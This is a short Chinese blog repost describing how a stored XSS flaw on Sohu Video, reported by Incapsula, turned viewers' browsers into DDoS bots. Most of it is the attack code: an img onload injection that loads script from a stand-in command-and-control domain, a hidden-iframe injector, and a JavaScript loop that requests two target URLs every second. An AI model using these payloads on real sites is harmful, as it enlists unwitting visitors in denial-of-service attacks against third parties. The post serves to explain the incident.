标签:xss 漏洞 跨站脚本攻击 ddos攻击 javascript
XSS又叫CSS (Cross Site Script)
,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
from:http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html
incapsula发现其一个客户遭受了应用层的DDos攻击。//
JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg" onload="$.getScript(‘http://c&cdomain.com/index.html‘)" />
// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
$("body").append("<iframe id=‘ifr11323‘ style=‘display:none;‘ src=‘http://c&cdomain.com/index.html‘></iframe>"); }
// Ajax DDoS tool in executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos(‘http://www.target1.com/1.jpg‘, ‘http://www.target2.com/1.jpg‘);
function ddos(url,url2){
window.setInterval(function (){
$.getScript(url);
$.getScript(url2);
},1000)
}
</script>
</body></html>注:攻击的效果就是每秒都请求一次url和url2指定的连接,如果一段视频30分钟,那么每个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求(如cc),如果是成千上万的人看个热门视频的话。。。
XSS攻击:SOHU视频XSS漏洞导致其用户成为DDOS肉鸡,布布扣,bubuko.com
XSS攻击:SOHU视频XSS漏洞导致其用户成为DDOS肉鸡
标签:xss 漏洞 跨站脚本攻击 ddos攻击 javascript
原文地址:http://blog.csdn.net/nextbest/article/details/25124505
